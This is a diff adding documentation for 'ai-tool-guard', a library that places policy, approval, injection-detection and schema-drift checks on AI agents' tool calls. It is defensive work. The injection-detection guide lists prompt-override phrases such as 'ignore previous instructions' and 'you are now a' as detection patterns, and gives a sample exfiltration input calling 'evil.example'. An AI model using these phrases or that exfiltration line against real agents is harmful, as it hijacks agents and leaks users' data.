OTel spans, application logs, and approval system events. + +### Alerting on Denials + +Send denied decisions to an alerting system in real time: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { alerting } from './alerting.js'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + if (record.verdict === 'deny') { + await alerting.send({ + severity: record.riskLevel === 'critical' ? 'critical' : 'warning', + title: `Tool blocked: ${record.toolName}`, + body: record.reason, + metadata: { + decisionId: record.id, + matchedRules: record.matchedRules, + riskLevel: record.riskLevel, + attributes: record.attributes, + }, + }); + } + }, +}); +``` + +### Compliance Reporting + +Collect decision records for a compliance dashboard that tracks tool usage, risk distribution, and denial rates: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { DecisionRecord } from 'ai-tool-guard'; + +const dailyStats = { + total: 0, + byVerdict: { allow: 0, deny: 0, 'require-approval': 0 }, + byRiskLevel: {} as Record, + evalDurationTotal: 0, +}; + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + dailyStats.total++; + dailyStats.byVerdict[record.verdict]++; + dailyStats.byRiskLevel[record.riskLevel] = + (dailyStats.byRiskLevel[record.riskLevel] ?? 0) + 1; + dailyStats.evalDurationTotal += record.evalDurationMs; + }, +}); +``` + +### Combining with OTel Spans + +The `id` field on each `DecisionRecord` is a UUIDv4 that can be attached to OTel spans as a custom attribute, enabling correlation between the structured audit log and distributed traces: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { createTracer, ATTR } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-service' }); + +const guard = createToolGuard({ + rules: [...], + otel: { enabled: true }, + onDecision: (record) => { + // Create a child span keyed to the decision ID. + const span = tracer.startSpan('my_service.tool_decision', { + attributes: { + [ATTR.DECISION_VERDICT]: record.verdict, + [ATTR.TOOL_NAME]: record.toolName, + 'decision.id': record.id, // Correlates with audit log entries. + }, + }); + span.end(); + }, +}); +``` + +--- + +## Field Details + +### Correlation via `id` + +The `id` is a UUIDv4 generated per evaluation. Use it as a foreign key when joining: + +- Audit log entries (written via `onDecision`) +- OTel spans (attach as a custom attribute, as shown above) +- Approval system records (the `ApprovalToken` contains `toolName` and `originalArgs` for cross-referencing) +- `ToolGuardError.decision.id` for errors caught at the call site + +### Duration Tracking via `evalDurationMs` + +`evalDurationMs` measures wall-clock time from the start of `evaluatePolicy()` to the point the record is produced. It does not include: + +- Time spent in `resolveUserAttributes()` or `resolveConversationContext()` +- Time spent waiting for approval (measured separately via the `approval_wait` OTel span) +- Tool execution time (measured via the `tool_execute` OTel span) + +Use this field to detect slow policy rules, especially those with async `condition` callbacks calling external services. + +### Redaction Tracking via `redactions` + +When output filters redact fields from a tool result, the names of those fields are recorded in the `redactions` array on the decision record. This makes it possible to audit what data was removed even though the redacted values themselves are not stored. + +```typescript +// Example: a decision record after output filtering. +const record = { + id: 'a1b2c3d4-...', + verdict: 'allow', + toolName: 'queryUser', + redactions: ['ssn', 'creditCardNumber'], + // ... +}; +``` + +`redactions` is `undefined` (not an empty array) when no redaction occurred, so `record.redactions?.length > 0` is the correct check. + +--- + +## Advanced Examples + +### Per-Tool Decision Aggregation + +Track per-tool metrics for a usage analytics system: + +```typescript +const toolStats = new Map(); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + const existing = toolStats.get(record.toolName) ?? { calls: 0, denials: 0 }; + existing.calls++; + if (record.verdict === 'deny') existing.denials++; + toolStats.set(record.toolName, existing); + }, +}); + +// Expose as a health check endpoint. +function getToolStats() { + return Object.fromEntries(toolStats.entries()); +} +``` + +### Decision Record Forwarding to External Audit System + +Buffer and batch-send decision records to an external audit service: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { DecisionRecord } from 'ai-tool-guard'; + +const buffer: DecisionRecord[] = []; + +setInterval(async () => { + if (buffer.length === 0) return; + const batch = buffer.splice(0, buffer.length); + await auditService.ingestBatch(batch); +}, 5000); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + buffer.push(record); + }, +}); +``` + +--- + +## How It Works + +1. The policy engine (`evaluatePolicy()`) runs all matching rules, applies the external backend if configured, and assembles a `DecisionRecord` with the final verdict, matched rule IDs, risk classification, and a reason string. The `evalDurationMs` is calculated using `performance.now()` around this evaluation. +2. The record's `id` is a randomly generated UUIDv4 produced per evaluation. +3. The guard calls `onDecision(record)` and awaits the result before proceeding to the verdict handling phase. +4. If the verdict is `deny` and the guard is not in dry-run mode, a `ToolGuardError` is thrown with `err.decision` set to the same record. +5. After tool execution completes and output filters run, any redacted field names are appended to `record.redactions`. The record passed to `onDecision` reflects the state at evaluation time, before output filtering — redactions are available on the error's decision record when output filtering occurs post-execution. + +--- + +## Related + +- [OpenTelemetry](opentelemetry.md) +- [Output Filtering](output-filtering.md) +- [API Reference — Types](../api/types.md) diff --git a/docs/guides/error-handling.md b/docs/guides/error-handling.md new file mode 100644 index 0000000..5816b1b --- /dev/null +++ b/docs/guides/error-handling.md @@ -0,0 +1,278 @@ +# Error Handling + +## Overview + +When ai-tool-guard blocks a tool call — whether due to a policy denial, a failed approval, rate limiting, argument validation, injection detection, or output filtering — it throws a `ToolGuardError`. All guard-originated errors derive from this single class, making it straightforward to distinguish guard failures from errors thrown by your own tool implementations. + +`ToolGuardError` extends the built-in `Error` class and adds three fields: a machine-readable `code`, the `toolName` that was involved, and an optional `decision` containing the full `DecisionRecord` that produced the verdict. + +--- + +## Basic Usage + +Wrap tool calls in a `try/catch` block and check `instanceof ToolGuardError` to distinguish guard errors from other exceptions: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +try { + const result = await guardedTools.deleteRecord.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError) { + console.error(`Guard blocked the call: [${err.code}] ${err.message}`); + // Handle the specific guard failure. + } else { + // Re-throw unexpected errors. + throw err; + } +} +``` + +--- + +## `ToolGuardError` Class + +```typescript +class ToolGuardError extends Error { + readonly name: 'ToolGuardError'; + readonly code: ToolGuardErrorCode; + readonly toolName: string; + readonly decision?: DecisionRecord; +} +``` + +| Field | Type | Description | +|---|---|---| +| `name` | `string` | Always `"ToolGuardError"`. Useful for logging and serialization. | +| `message` | `string` | Human-readable explanation of why the call was blocked, suitable for logging. | +| `code` | `ToolGuardErrorCode` | Machine-readable error category. Use this in `switch` statements. | +| `toolName` | `string` | The name of the tool that was being invoked when the error occurred. | +| `decision` | `DecisionRecord \| undefined` | The full decision record for policy-originated errors. Present on `policy-denied` and `approval-denied`. | + +--- + +## Error Codes + +```typescript +type ToolGuardErrorCode = + | 'policy-denied' + | 'approval-denied' + | 'no-approval-handler' + | 'arg-validation-failed' + | 'injection-detected' + | 'rate-limited' + | 'output-blocked' + | 'mcp-drift'; +``` + +| Code | Description | Typical Cause | +|---|---|---| +| `policy-denied` | The policy engine returned a `deny` verdict. | A rule matched the tool call and its condition evaluated to `true`. | +| `approval-denied` | The approval handler returned `approved: false`. | A human operator rejected the tool call in the approval UI. | +| `no-approval-handler` | A `require-approval` verdict was issued but no `onApprovalRequired` handler is configured. | The guard was set up without an approval handler, but a rule requires one. | +| `arg-validation-failed` | One or more `argGuards` rejected the arguments. | An argument value failed a type check, range check, or custom validation. | +| `injection-detected` | The injection detector scored the arguments above the configured threshold with an `action` of `deny`. | Arguments contained patterns associated with prompt injection. | +| `rate-limited` | The tool exceeded its configured call rate or concurrency limit. | Too many calls in the time window, or the concurrency cap is reached. | +| `output-blocked` | An output filter returned a `block` verdict after the tool executed. | The tool result matched a pattern that must not be returned to the model. | +| `mcp-drift` | An MCP schema fingerprint mismatch was detected before execution. | A tool schema changed since it was pinned. | + +--- + +## Accessing the `DecisionRecord` + +For `policy-denied` and `approval-denied` errors, `err.decision` contains the complete `DecisionRecord`. This includes the matched rule IDs, risk level, risk categories, and evaluation duration: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +try { + await guardedTools.sendEmail.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError && err.code === 'policy-denied') { + const record = err.decision!; + console.log('Verdict:', record.verdict); + console.log('Matched rules:', record.matchedRules.join(', ')); + console.log('Risk level:', record.riskLevel); + console.log('Reason:', record.reason); + console.log('Eval duration:', record.evalDurationMs, 'ms'); + } +} +``` + +For all other error codes, `err.decision` is `undefined`. + +--- + +## Handling All Error Codes + +Use a `switch` statement on `err.code` to handle each error type distinctly: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +async function runToolSafely(name: string, args: unknown) { + try { + return await guardedTools[name].execute(args, execOptions); + } catch (err) { + if (!(err instanceof ToolGuardError)) throw err; + + switch (err.code) { + case 'policy-denied': + return { + error: 'This action is not permitted by your current access policy.', + ruleIds: err.decision?.matchedRules, + }; + + case 'approval-denied': + return { + error: 'The action was reviewed and rejected by an operator.', + }; + + case 'no-approval-handler': + // Configuration error — log loudly, do not expose to end users. + console.error('Guard misconfigured: approval required but no handler set.'); + return { error: 'This action requires approval, which is not configured.' }; + + case 'arg-validation-failed': + return { + error: `The arguments provided to "${err.toolName}" are invalid.`, + detail: err.message, + }; + + case 'injection-detected': + return { + error: 'The request was blocked due to suspected prompt injection.', + }; + + case 'rate-limited': + return { + error: `"${err.toolName}" is being called too frequently. Please wait and try again.`, + }; + + case 'output-blocked': + return { + error: 'The result of this action cannot be returned due to output policy.', + }; + + case 'mcp-drift': + return { + error: 'The tool schema has changed and must be re-validated before use.', + }; + + default: + throw err; + } + } +} +``` + +--- + +## Advanced Examples + +### Error Reporting and Monitoring + +Send blocked calls to your monitoring platform for alerting and trend analysis: + +```typescript +import { createToolGuard, ToolGuardError } from 'ai-tool-guard'; +import { metrics } from './monitoring.js'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + if (record.verdict !== 'allow') { + await metrics.increment('tool_guard.blocked', { + tool: record.toolName, + verdict: record.verdict, + riskLevel: record.riskLevel, + rules: record.matchedRules.join(','), + }); + } + }, +}); + +// In the call site, report errors with stack context. +try { + await guardedTool.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError) { + await monitoring.reportEvent('tool_guard_error', { + code: err.code, + toolName: err.toolName, + decisionId: err.decision?.id, + message: err.message, + }); + } + throw err; +} +``` + +### Graceful Degradation + +Fall back to a safe alternative when the primary tool is blocked: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +async function readUserData(userId: string) { + try { + // Try full record read. + return await guardedTools.readFullRecord.execute({ userId }, execOptions); + } catch (err) { + if (err instanceof ToolGuardError && err.code === 'policy-denied') { + // Fall back to redacted summary if full read is not permitted. + return await guardedTools.readSummary.execute({ userId }, execOptions); + } + throw err; + } +} +``` + +### User-Friendly Error Messages + +Translate guard errors into user-facing messages keyed on error code, keeping internal details out of the AI response: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +const userMessages: Record = { + 'policy-denied': 'I am not permitted to perform that action.', + 'approval-denied': 'That action was not approved.', + 'rate-limited': 'I have reached the limit for that action. Please try again shortly.', + 'injection-detected': 'That request cannot be processed.', + 'output-blocked': 'I cannot share that information.', + 'arg-validation-failed': 'The parameters for that action are not valid.', + 'mcp-drift': 'That tool is temporarily unavailable.', + 'no-approval-handler': 'That action requires approval, which is not available right now.', +}; + +function toUserMessage(err: unknown): string { + if (err instanceof ToolGuardError) { + return userMessages[err.code] ?? 'That action could not be completed.'; + } + return 'An unexpected error occurred.'; +} +``` + +--- + +## How It Works + +`ToolGuardError` is thrown directly by the `ToolGuard` execution pipeline at the point where a guard check fails: + +- **Injection check** — thrown before argument guards if `injectionDetection.action === 'deny'` and the score exceeds the threshold. +- **Argument guards** — thrown if any `argGuard` validation function returns a non-null reason string. +- **Policy evaluation** — thrown after `evaluatePolicy()` returns a `deny` verdict (not in dry-run mode). The `DecisionRecord` from evaluation is attached as `err.decision`. +- **Approval flow** — thrown if the approval handler returns `approved: false`, or if no handler is configured for a `require-approval` verdict. +- **Rate limiting** — thrown if the rate limiter's `acquire()` call returns `allowed: false`. +- **Output filtering** — thrown after tool execution if a filter returns `block` verdict. + +Errors from the tool's own `execute()` function are not wrapped — they propagate as-is. Only errors originating from the guard pipeline produce `ToolGuardError` instances. + +--- + +## Related + +- [API Reference — Core](../api/core.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/external-backends.md b/docs/guides/external-backends.md new file mode 100644 index 0000000..7b966a1 --- /dev/null +++ b/docs/guides/external-backends.md @@ -0,0 +1,249 @@ +# External Backends + +`ai-tool-guard` can delegate policy decisions to an external engine — Open Policy Agent (OPA), AWS Cedar, a custom database-backed ABAC system, or any other service — through the `PolicyBackend` interface. The external backend is evaluated first; built-in rules then apply with escalation semantics on top of the backend result. + +## Overview + +External backends are useful when: + +- Your organisation already maintains policy definitions in OPA/Rego or Cedar. +- Policy must be managed centrally and consumed by multiple services. +- Access decisions depend on data that lives in an external store (e.g. a permissions database). +- Audit requirements mandate a single authoritative policy engine. + +## Basic Usage + +Implement the `PolicyBackend` interface and pass the instance as `backend` in `GuardOptions`: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +const myBackend: PolicyBackend = { + name: "my-policy-service", + async evaluate(ctx: PolicyContext): Promise { + // Call your external service and return a result. + return { + verdict: "allow", + reason: "Policy service approved the call.", + matchedRules: ["policy-service:rule-42"], + }; + }, +}; + +const guard = createToolGuard({ backend: myBackend }); +``` + +## Configuration Options + +### `PolicyBackend` + +| Property | Type | Description | +|---|---|---| +| `name` | `string` | Unique name used in logs and traces. | +| `evaluate` | `(ctx: PolicyContext) => Promise` | Called for every tool invocation before built-in rules run. | + +### `PolicyBackendResult` + +| Property | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | `"allow"`, `"deny"`, or `"require-approval"`. | +| `reason` | `string` | Yes | Human-readable explanation recorded in `DecisionRecord.reason`. | +| `matchedRules` | `string[]` | Yes | Identifiers of the rules that fired (for audit). | +| `attributes` | `Record` | No | Additional metadata merged into `DecisionRecord.attributes`. | + +### `PolicyContext` (input to the backend) + +The context object passed to `evaluate` contains: + +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the tool being invoked. | +| `args` | `Record` | Arguments the model wants to pass to the tool. | +| `userAttributes` | `Record` | Caller-supplied attributes (user ID, roles, tenant, etc.). | +| `conversation` | `ConversationContext \| undefined` | Session-level metadata such as `riskScore` and `priorFailures`. | +| `dryRun` | `boolean \| undefined` | Whether this is a simulation evaluation. | + +## Advanced Examples + +### OPA / Rego Backend + +The following example calls a locally running OPA server using the REST API. The Rego policy receives the tool name and user attributes and returns a decision object. + +```ts +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +// Example Rego policy (data.toolguard.authz): +// +// package toolguard.authz +// +// default allow = false +// +// allow { +// input.user.roles[_] == "admin" +// } +// +// allow { +// input.tool.riskLevel == "low" +// } + +const opaBackend: PolicyBackend = { + name: "opa", + async evaluate(ctx: PolicyContext): Promise { + const response = await fetch("http://localhost:8181/v1/data/toolguard/authz", { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ + input: { + tool: { name: ctx.toolName }, + user: ctx.userAttributes, + args: ctx.args, + }, + }), + }); + + if (!response.ok) { + throw new Error(`OPA returned HTTP ${response.status}`); + } + + const body = await response.json() as { result?: { allow?: boolean; reason?: string } }; + const result = body.result ?? {}; + const allowed = result.allow ?? false; + + return { + verdict: allowed ? "allow" : "deny", + reason: result.reason ?? (allowed ? "OPA policy approved." : "OPA policy denied."), + matchedRules: ["opa:toolguard/authz"], + }; + }, +}; + +const guard = createToolGuard({ backend: opaBackend }); +``` + +!!! tip "Dry-run forwarding" + Forward `ctx.dryRun` to your OPA input so the policy server can log simulation evaluations separately from real ones. + +### Database-Backed ABAC + +For teams that store permissions in a relational database, a custom backend can query the database and translate rows into verdicts: + +```ts +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +interface Permission { + toolPattern: string; + verdict: "allow" | "deny" | "require-approval"; + reason: string; +} + +function createDatabaseBackend(db: DatabaseClient): PolicyBackend { + return { + name: "database-abac", + async evaluate(ctx: PolicyContext): Promise { + const userId = ctx.userAttributes["userId"] as string | undefined; + if (!userId) { + return { + verdict: "deny", + reason: "No user identity present in request.", + matchedRules: ["db-abac:no-identity"], + }; + } + + // Query the permissions table for this user and tool. + const permissions: Permission[] = await db.query( + `SELECT tool_pattern, verdict, reason + FROM tool_permissions + WHERE user_id = $1 + AND $2 LIKE tool_pattern + ORDER BY priority DESC + LIMIT 1`, + [userId, ctx.toolName], + ); + + if (permissions.length === 0) { + return { + verdict: "deny", + reason: `No permission record found for user "${userId}" and tool "${ctx.toolName}".`, + matchedRules: [], + }; + } + + const { verdict, reason } = permissions[0]; + return { + verdict, + reason, + matchedRules: [`db-abac:user:${userId}:tool:${ctx.toolName}`], + attributes: { userId, source: "database-abac" }, + }; + }, + }; +} + +const guard = createToolGuard({ + backend: createDatabaseBackend(myDatabaseClient), +}); +``` + +### Combining a Backend with Built-In Rules + +You can layer built-in rules on top of a backend. The engine applies escalation: if the built-in rules produce a stricter verdict than the backend, the stricter verdict wins. + +```ts +import { createToolGuard, deny } from "ai-tool-guard"; + +const guard = createToolGuard({ + backend: opaBackend, + rules: [ + // Hard deny for critical tools regardless of what OPA says. + deny({ + tools: "*", + riskLevels: ["critical"], + description: "Critical tools are always denied, even if OPA permits them.", + priority: 1000, + }), + ], +}); +``` + +!!! warning "Built-in rules can only escalate, not relax" + If the backend returns `"deny"`, a built-in `allow` rule will not override it. Escalation is unidirectional: `deny > require-approval > allow`. To relax a backend decision, you must update the backend policy itself. + +## How It Works + +The backend integration is handled in `evaluatePolicy` (`src/policy/engine.ts`): + +1. **Backend called first** — `options.backend.evaluate(ctx)` is awaited. Its returned `verdict`, `reason`, `matchedRules`, and `attributes` become the initial values for the decision record. + +2. **Built-in rules run unconditionally** — Even when a backend is configured, the built-in rules array is evaluated. The engine checks whether the rules verdict is stricter than the backend verdict using a severity map: `deny (2) > require-approval (1) > allow (0)`. + +3. **Escalation applied** — If the built-in rules produce a stricter verdict, the record is updated with the new verdict, reason, and matched rule IDs. The backend's matched rule IDs are preserved and merged. + +4. **Error handling** — If `backend.evaluate` throws, the exception propagates to the caller. The guard does not silently fall back to `allow` on backend errors. Wrap your backend implementation in a try/catch if you need a fallback posture: + +```ts +const resilientBackend: PolicyBackend = { + name: "resilient-opa", + async evaluate(ctx: PolicyContext): Promise { + try { + return await opaBackend.evaluate(ctx); + } catch (err) { + // Fail closed: deny on backend error. + console.error("OPA backend error:", err); + return { + verdict: "deny", + reason: "Policy backend unavailable; failing closed.", + matchedRules: ["resilient-opa:fallback-deny"], + }; + } + }, +}; +``` + +!!! note "Only one backend at a time" + `GuardOptions.backend` accepts a single `PolicyBackend` instance. To fan out to multiple backends, implement a composite backend that calls each service and merges results internally before returning a single `PolicyBackendResult`. + +## Related + +- [Policy Engine](policy-engine.md) — evaluation order, escalation mechanics, and `DecisionRecord` structure. +- [API Reference](../api/policy.md) — full type documentation for `PolicyBackend`, `PolicyBackendResult`, and `PolicyContext`. diff --git a/docs/guides/injection-detection.md b/docs/guides/injection-detection.md new file mode 100644 index 0000000..c1dcee5 --- /dev/null +++ b/docs/guides/injection-detection.md @@ -0,0 +1,232 @@ +# Injection Detection + +Prompt injection is the primary attack vector against AI agents: an adversary embeds instructions in data that the model reads and the agent then passes as arguments to tools. ai-tool-guard runs an injection check at the tool boundary — before arg validation and before policy evaluation — so that suspicious calls can be blocked or escalated regardless of which policy rules would otherwise apply. + +## Overview + +The injection check runs first in the evaluation pipeline. It scores the tool arguments for adversarial patterns and, depending on configuration, either blocks the call outright, downgrades it to require human approval, or logs it and proceeds. The check is optional and opt-in: configure `injectionDetection` on `GuardOptions` to enable it. + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "allow-low", toolPatterns: ["*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.5, + action: "deny", + }, +}); +``` + +## Basic Usage + +Pass an `InjectionDetectorConfig` as `injectionDetection` in `GuardOptions`. The check applies to every tool call managed by that guard instance. + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [/* ... */], + injectionDetection: { + threshold: 0.6, // suspicion score required to trigger + action: "deny", // what to do when triggered + }, +}); +``` + +When the check triggers, the tool call receives a `DecisionRecord` with `verdict: "deny"` (or `"require-approval"` for the `downgrade` action) and the caller receives a `ToolGuardError` with `code: "injection-detected"`. + +## Configuration Options + +### `InjectionDetectorConfig` + +| Field | Type | Default | Description | +|---|---|---|---| +| `threshold` | `number` (0–1) | `0.5` | Suspicion score at or above which the action fires. | +| `action` | `"deny" \| "downgrade" \| "log"` | `"log"` | What to do when `score >= threshold`. | +| `detect` | `(args) => number \| Promise` | built-in heuristic | Custom detector function. | + +### Actions + +**`deny`** — Blocks the call entirely. The tool is never executed. Use this for public-facing tools where any injection signal should be treated as a hard block. + +**`downgrade`** — Converts the verdict to `"require-approval"`. The call proceeds to the approval flow, where a human can inspect the arguments before allowing execution. Use this when you want oversight rather than a blanket block. + +**`log`** — Records the injection score on the `DecisionRecord` but does not change the verdict. The tool call continues through normal policy evaluation. Use this for monitoring and tuning before enforcing stricter actions. + +## Built-in Heuristic Detector + +When no custom `detect` function is provided, the built-in heuristic detector runs. It flattens all string values in the args object into a single text blob (up to 10 levels of nesting) and tests it against a set of weighted patterns. + +### Pattern Categories + +| Category | Example Patterns | Max Weight | +|---|---|---| +| Instruction override | `ignore previous instructions`, `disregard all prior` | 0.85–0.9 | +| Role hijacking | `you are now a`, `new instructions:`, `system prompt` | 0.6–0.75 | +| Delimiter injection | ` ```system `, ``, `` | 0.7–0.8 | +| Role-play / persona | `act as`, `pretend you're` | 0.5–0.6 | +| Data exfiltration | `fetch`, `curl`, `wget`, `http://`, `https://` | 0.4 | +| Encoded payloads | `base64_decode`, `\xNN` hex escapes | 0.4–0.5 | + +### Scoring Algorithm + +The detector returns the **maximum weight** of any pattern that matches — it does not sum weights. This means a single high-confidence pattern (`"ignore previous instructions"`, weight 0.9) scores 0.9 regardless of how many other patterns also appear. + +``` +score = max(weight for each matching pattern) +``` + +Additionally, if the flattened text exceeds **5000 characters**, the score is raised to at least `0.3`. This length heuristic catches payloads that attempt to overwhelm context without using recognizable injection phrases. + +The final score is clamped to `[0, 1]`. + +### Example Scores + +| Input | Score | Reason | +|---|---|---| +| `"list all files in /tmp"` | 0.0 | No patterns match | +| `"fetch http://evil.example/exfil?d=..."` | 0.4 | Data exfiltration pattern | +| `"ignore previous instructions and ..."` | 0.9 | Instruction override | +| 6000-character string with no patterns | 0.3 | Length heuristic | + +## Custom Detector + +Replace the built-in heuristic with your own scoring function — including an LLM-as-judge approach — by providing `detect`: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + injectionDetection: { + threshold: 0.7, + action: "deny", + async detect(args) { + // Example: call an LLM classifier + const text = JSON.stringify(args); + const score = await myInjectionClassifier.score(text); + return score; // must be 0-1 + }, + }, +}); +``` + +When `detect` is provided, the built-in heuristic does not run. The function receives the raw `args` object and must return a number between 0 and 1. It can be async. + +!!! tip "LLM-as-judge" + A small, fast model dedicated to injection classification can be significantly more accurate than regex heuristics for sophisticated attacks. Use the custom detector to integrate one. Keep latency in mind: the injection check blocks tool execution until the detector resolves. + +## Pipeline Position + +The injection check runs **first** in the evaluation pipeline, before argument validation and before policy evaluation: + +``` +Tool call received + | + v +[1] Injection check <-- checkInjection() runs here + | + v (if not blocked) +[2] Arg guards <-- evaluateArgGuards() + | + v +[3] Policy evaluation <-- PolicyEngine.evaluate() + | + v +[4] Tool execution + | + v +[5] Output filters +``` + +This ordering means an injection-flagged call never reaches policy evaluation or tool execution, even if a policy rule would otherwise allow it. + +## Advanced Examples + +### Strict Mode for a Public-Facing Tool + +For tools that accept user-controlled input directly, use a low threshold and the `deny` action: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "default-allow", toolPatterns: ["*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.4, // Lower than default — fail safe for public exposure. + action: "deny", + }, +}); + +// This tool accepts raw user text, so strict injection blocking applies. +const wrappedSearch = guard.guardTool("search", searchTool, { riskLevel: "medium" }); +``` + +### Relaxed Monitoring for Internal Tools + +For tools called from trusted internal services, use `"log"` to collect data without blocking: + +```typescript +const guard = createToolGuard({ + rules: [{ id: "internal-allow", toolPatterns: ["internal.*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.5, + action: "log", // Flag in DecisionRecord but do not block. + }, + onDecision(record) { + if (record.attributes.injectionScore) { + metrics.histogram("injection.score", record.attributes.injectionScore as number); + } + }, +}); +``` + +### Downgrade to Approval for High-Risk Tools + +For high-risk tools, route suspected injections to a human approver rather than blocking outright: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + injectionDetection: { + threshold: 0.5, + action: "downgrade", // Converts verdict to require-approval. + }, + async onApprovalRequired(token) { + // Send to your approval UI. + return await approvalQueue.submit(token); + }, +}); + +const wrappedDeleteTool = guard.guardTool("deleteRecord", deleteRecordTool, { + riskLevel: "critical", + riskCategories: ["data-delete"], +}); +``` + +## How It Works + +`checkInjection(ctx, config)` is the internal function that runs the check: + +1. If a custom `detect` function is configured, call it with `ctx.args` and await the result. +2. Otherwise, run `heuristicDetect(ctx.args)`: + - Flatten all string values in `args` into a single string (recursively, up to depth 10). + - Test the string against each pattern in `INJECTION_PATTERNS`. + - Record the maximum matched weight. + - If the string exceeds 5000 characters, ensure the score is at least 0.3. +3. Compare `score` to `config.threshold` (default `0.5`). If `score >= threshold`, `suspected` is `true`. +4. Map the action to a verdict override: + - `"deny"` → `verdictOverride: "deny"` + - `"downgrade"` → `verdictOverride: "require-approval"` + - `"log"` → no override, call proceeds +5. The result `{ score, suspected, action, verdictOverride }` is returned to the evaluation pipeline. + +The injection score is recorded in the `DecisionRecord`'s `attributes` map under `injectionScore` for observability. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Argument Validation](argument-validation.md) +- [Approval Workflows](approval-workflows.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/mcp-drift-detection.md b/docs/guides/mcp-drift-detection.md new file mode 100644 index 0000000..4149f5a --- /dev/null +++ b/docs/guides/mcp-drift-detection.md @@ -0,0 +1,313 @@ +# MCP Drift Detection + +## Overview + +Model Context Protocol (MCP) servers expose tools dynamically. When a server updates a tool's schema — changing parameter types, adding required fields, or removing arguments — an AI agent that cached the old schema may call the tool with malformed arguments, or worse, receive unexpected data it was not designed to handle. + +MCP drift detection solves this by pinning a cryptographic fingerprint of each tool schema at a known-good point in time and checking live schemas against those pins at runtime or in CI. Any change to the schema produces a different fingerprint and surfaces a structured `McpDriftChange` record with a human-readable remediation message. + +--- + +## Basic Usage + +Pin your tool schemas once at setup time, then check for drift before each agent run: + +```typescript +import { + pinFingerprint, + detectDrift, + FingerprintStore, +} from 'ai-tool-guard/mcp'; + +// 1. Pin schemas when you first approve them. +const store = new FingerprintStore(); + +const fp = await pinFingerprint( + 'readFile', + 'filesystem-server', + myFileReadToolSchema, + 'production', +); +store.set(fp); + +// 2. At runtime, fetch live schemas from the MCP server and check for drift. +const liveSchemas = await fetchSchemasFromMcpServer(); + +const result = await detectDrift(store.getAll(), liveSchemas); + +if (result.drifted) { + for (const change of result.changes) { + console.error(change.remediation); + } + process.exit(1); +} +``` + +--- + +## Configuration Options + +MCP drift detection is a standalone module. It does not require a `ToolGuard` instance. All functions are pure async utilities. + +The `mcpFingerprint` field on `ToolGuardConfig` lets you attach an expected schema hash to a guarded tool so the guard can verify it at execution time: + +```typescript +const tools = guard.guardTools({ + readFile: { + tool: readFileTool, + riskLevel: 'medium', + mcpFingerprint: 'abc123...', // Expected SHA-256 hash + }, +}); +``` + +--- + +## Core Functions + +### `computeFingerprint(toolName, schema): Promise` + +Computes a SHA-256 fingerprint for a tool schema. The schema is canonicalized (object keys sorted recursively) before hashing, so fingerprints are stable regardless of key insertion order. + +```typescript +import { computeFingerprint } from 'ai-tool-guard/mcp'; + +const hash = await computeFingerprint('readFile', { + type: 'object', + properties: { + path: { type: 'string' }, + }, + required: ['path'], +}); +// => "4f3e2a1b..." (64-character hex string) +``` + +The input to the hash function is `JSON.stringify({ toolName, schema })` with canonicalized key order. Including `toolName` in the hash means the same schema used under two different tool names produces two different fingerprints. + +### `pinFingerprint(toolName, serverId, schema, environment?): Promise` + +Creates a `McpToolFingerprint` record capturing the current schema hash, the time of pinning, and an optional environment tag. + +```typescript +import { pinFingerprint } from 'ai-tool-guard/mcp'; + +const fp: McpToolFingerprint = await pinFingerprint( + 'queryDatabase', + 'db-server-v2', + queryDatabaseSchema, + 'staging', +); +// { +// toolName: 'queryDatabase', +// serverId: 'db-server-v2', +// schemaHash: 'c4f9...', +// pinnedAt: '2024-01-15T10:30:00.000Z', +// environment: 'staging', +// } +``` + +### `detectDrift(pinnedFingerprints, currentSchemas): Promise` + +Compares a set of pinned fingerprints against live schemas. Returns a `McpDriftResult` indicating whether any drift was found and providing details for each changed tool. + +Tools present in `currentSchemas` but absent from `pinnedFingerprints` are also flagged — they are treated as unknown tools that have not been reviewed. + +```typescript +const result = await detectDrift( + store.getAll(), + [ + { toolName: 'readFile', serverId: 'fs-server', schema: liveReadFileSchema }, + { toolName: 'writeFile', serverId: 'fs-server', schema: liveWriteFileSchema }, + ], +); + +console.log(result.drifted); // true | false +console.log(result.changes.length); // number of drifted tools +``` + +--- + +## Data Types + +### `McpToolFingerprint` + +```typescript +interface McpToolFingerprint { + /** Tool name. */ + toolName: string; + /** MCP server identifier. 